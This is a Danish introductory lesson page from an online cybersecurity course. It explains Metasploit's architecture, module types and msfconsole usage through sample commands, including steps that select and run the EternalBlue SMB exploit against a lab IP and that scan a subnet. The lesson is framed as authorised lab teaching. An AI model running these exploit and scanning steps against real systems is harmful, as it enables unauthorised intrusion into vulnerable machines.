Cyber Security Academy · Lektion

Metasploit-arkitektur og msfconsole

Navigér i msfconsole, forstå strukturen af exploits, payloads og moduler, og konfigurér indstillinger.

Lektion 1 af 413 trin

Metasploit-arkitektur og msfconsole er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 1 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad er Metasploit?

Metasploit Framework er en platform med åben kildekode til penetrationstest, som giver en samlet grænseflade til udvikling, test og udførelse af exploits. Det er branchestandarden for autoriseret udnyttelse i laboratoriemiljøer.

Metasploit-komponenter

De vigtigste komponenter er: msfconsole (interaktiv kommandolinjegrænseflade), msfvenom (payload-generator), Metasploit DB (PostgreSQL til lagring af værter/sessioner) og Armitage (grafisk brugergrænseflade).

Start af msfconsole

Start msfconsole, og initialiser databasen. Prompten ændres til msf6 >. Tabulatorfuldførelse fungerer for alle kommandoer, modulnavne og indstillinger.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Modultyper

Metasploit organiserer funktionerne i modultyper: exploit (angrebskode til en bestemt sårbarhed), payload (kode, der kører efter udnyttelsen), auxiliary (scannere/fuzzere), post (efter udnyttelse), encoder og nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Søgning efter moduler

Kommandoen search filtrerer moduler efter navn, CVE, platform eller rangering. Modulrangeringen angiver pålideligheden: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Brug af et exploit-modul

Vælg et modul med use, se de nødvendige indstillinger med show options, angiv værdier med set, og kør det med run eller exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Angivelse af globale indstillinger

setg angiver indstillinger globalt for alle efterfølgende moduler — nyttigt til LHOST, LPORT og RHOSTS, som forbliver uændrede under hele opgaven.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Auxiliary-moduler

Auxiliary-moduler udfører scanning, kortlægning og fuzzing uden at levere payloads. Eksempler er en SMB-versionsscanner, brute force mod SSH-login og en HTTP-mappescanner.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Håndtering af arbejdsområder

Arbejdsområder organiserer scanningsdata og sessioner for hver opgave. Opret et nyt arbejdsområde i begyndelsen af hver vurdering, så dataene holdes adskilt.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Nmap-integration

Importér Nmap-resultater fra XML-scanninger direkte til Metasploit-databasen for at udfylde tabellerne med værter og tjenester, så du kan vælge målrettede moduler.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Hjælp og dokumentation

Alle moduler har indbygget dokumentation. Brug info til at læse modulbeskrivelsen, pålidelighedsvurderingen, referencerne (CVE'er, sikkerhedsmeddelelser) og de nødvendige indstillinger.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Hurtigt tjek

Hvilken kommando vælger et modul i msfconsole?

Opsummering: Metasploit-arkitektur

msfconsole er det centrale knudepunkt: Søg efter moduler, angiv indstillinger, kør exploits, og administrér sessioner. Arbejd altid i et navngivet arbejdsområde, importér Nmap-resultater for at udfylde databasen, og læs moduloplysningerne, før du kører noget — forstå, hvad du udfører, og hvorfor.

Gratis at komme i gang

Lær Cyber Security Academy med en AI-underviser — gratis

Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.

Kurser
76
Lektioner
303

Ofte stillede spørgsmål

Er lektionen “Metasploit-arkitektur og msfconsole” gratis?

Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Metasploit-arkitektur og msfconsole”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad lærer jeg i “Metasploit-arkitektur og msfconsole”?

Navigér i msfconsole, forstå strukturen af exploits, payloads og moduler, og konfigurér indstillinger. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.

Skal jeg have erfaring for at begynde på Cyber Security Academy?

Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 1 af 4.

Hvor lang tid tager lektionen “Metasploit-arkitektur og msfconsole”?

De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.

Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?

Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.

Alle lektioner i dette kursus

  1. Metasploit-arkitektur og msfconsole
  2. Udnyttelse af en kendt sårbarhed
  3. Payloads: Staged kontra stageless, Meterpreter
  4. Efter exploitering: Pivotering og persistens
← Tilbage til Cyber Security Academy